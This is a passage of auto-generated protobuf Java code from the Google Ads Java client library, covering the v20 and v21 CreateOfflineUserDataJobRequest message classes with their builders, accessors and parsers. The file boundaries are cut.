*/ public Builder setCustomerIdBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.ads.googleads.v20.resources.OfflineUserDataJob job_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.OfflineUserDataJob, com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder> jobBuilder_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ public boolean hasJob() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ public com.google.ads.googleads.v20.resources.OfflineUserDataJob getJob() { if (jobBuilder_ == null) { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } else { return jobBuilder_.getMessage(); } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob(com.google.ads.googleads.v20.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (value == null) { throw new NullPointerException(); } job_ = value; } else { jobBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. 
* </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob( com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder builderForValue) { if (jobBuilder_ == null) { job_ = builderForValue.build(); } else { jobBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeJob(com.google.ads.googleads.v20.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && job_ != null && job_ != com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance()) { getJobBuilder().mergeFrom(value); } else { job_ = value; } } else { jobBuilder_.mergeFrom(value); } if (job_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearJob() { bitField0_ = (bitField0_ & ~0x00000002); job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder getJobBuilder() { bitField0_ |= 0x00000002; onChanged(); return getJobFieldBuilder().getBuilder(); } /** * <pre> * Required. The offline user data job to be created. 
* </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { if (jobBuilder_ != null) { return jobBuilder_.getMessageOrBuilder(); } else { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.OfflineUserDataJob, com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder> getJobFieldBuilder() { if (jobBuilder_ == null) { jobBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.OfflineUserDataJob, com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder>( getJob(), getParentForChildren(), isClean()); job_ = null; } return jobBuilder_; } private boolean validateOnly_ ; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <pre> * If true, the request is validated but not executed. 
Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } private boolean enableMatchRateRangePreview_ ; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @param value The enableMatchRateRangePreview to set. * @return This builder for chaining. */ public Builder setEnableMatchRateRangePreview(boolean value) { enableMatchRateRangePreview_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return This builder for chaining. 
*/ public Builder clearEnableMatchRateRangePreview() { bitField0_ = (bitField0_ & ~0x00000008); enableMatchRateRangePreview_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) private static final com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest(); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> PARSER = new com.google.protobuf.AbstractParser<CreateOfflineUserDataJobRequest>() { @java.lang.Override public CreateOfflineUserDataJobRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return 
builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,977
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/CreateOfflineUserDataJobRequest.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/services/offline_user_data_job_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.services; /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v21.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest} */ public final class CreateOfflineUserDataJobRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) CreateOfflineUserDataJobRequestOrBuilder { private static final long serialVersionUID = 0L; // Use CreateOfflineUserDataJobRequest.newBuilder() to construct. private CreateOfflineUserDataJobRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateOfflineUserDataJobRequest() { customerId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CreateOfflineUserDataJobRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.Builder.class); } private int 
bitField0_; public static final int CUSTOMER_ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ @java.lang.Override public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ @java.lang.Override public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int JOB_FIELD_NUMBER = 2; private com.google.ads.googleads.v21.resources.OfflineUserDataJob job_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ @java.lang.Override public boolean hasJob() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. 
*/ @java.lang.Override public com.google.ads.googleads.v21.resources.OfflineUserDataJob getJob() { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } public static final int ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER = 5; private boolean enableMatchRateRangePreview_ = false; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. 
*/ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getJob()); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { output.writeBool(5, enableMatchRateRangePreview_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getJob()); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(5, enableMatchRateRangePreview_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest)) { return super.equals(obj); } com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest other = 
(com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) obj; if (!getCustomerId() .equals(other.getCustomerId())) return false; if (hasJob() != other.hasJob()) return false; if (hasJob()) { if (!getJob() .equals(other.getJob())) return false; } if (getValidateOnly() != other.getValidateOnly()) return false; if (getEnableMatchRateRangePreview() != other.getEnableMatchRateRangePreview()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + CUSTOMER_ID_FIELD_NUMBER; hash = (53 * hash) + getCustomerId().hashCode(); if (hasJob()) { hash = (37 * hash) + JOB_FIELD_NUMBER; hash = (53 * hash) + getJob().hashCode(); } hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getValidateOnly()); hash = (37 * hash) + ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getEnableMatchRateRangePreview()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public 
static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static 
com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v21.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. 
* </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.Builder.class); } // Construct using com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getJobFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; customerId_ = ""; job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } validateOnly_ = false; enableMatchRateRangePreview_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return 
com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest build() { com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest buildPartial() { com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest result = new com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.customerId_ = customerId_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.job_ = jobBuilder_ == null ? 
job_ : jobBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.enableMatchRateRangePreview_ = enableMatchRateRangePreview_; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) { return mergeFrom((com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest other) { if (other == com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.getDefaultInstance()) return this; if (!other.getCustomerId().isEmpty()) { customerId_ = other.customerId_; bitField0_ |= 0x00000001; onChanged(); } if (other.hasJob()) { mergeJob(other.getJob()); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } if 
(other.getEnableMatchRateRangePreview() != false) { setEnableMatchRateRangePreview(other.getEnableMatchRateRangePreview()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { customerId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage( getJobFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 case 40: { enableMatchRateRangePreview_ = input.readBool(); bitField0_ |= 0x00000008; break; } // case 40 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. 
*/ public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } else { return (java.lang.String) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The customerId to set. * @return This builder for chaining. */ public Builder setCustomerId( java.lang.String value) { if (value == null) { throw new NullPointerException(); } customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return This builder for chaining. */ public Builder clearCustomerId() { customerId_ = getDefaultInstance().getCustomerId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The bytes for customerId to set. * @return This builder for chaining. 
*/ public Builder setCustomerIdBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.ads.googleads.v21.resources.OfflineUserDataJob job_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.OfflineUserDataJob, com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder> jobBuilder_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ public boolean hasJob() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ public com.google.ads.googleads.v21.resources.OfflineUserDataJob getJob() { if (jobBuilder_ == null) { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } else { return jobBuilder_.getMessage(); } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob(com.google.ads.googleads.v21.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (value == null) { throw new NullPointerException(); } job_ = value; } else { jobBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. 
* </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob( com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder builderForValue) { if (jobBuilder_ == null) { job_ = builderForValue.build(); } else { jobBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeJob(com.google.ads.googleads.v21.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && job_ != null && job_ != com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance()) { getJobBuilder().mergeFrom(value); } else { job_ = value; } } else { jobBuilder_.mergeFrom(value); } if (job_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearJob() { bitField0_ = (bitField0_ & ~0x00000002); job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public 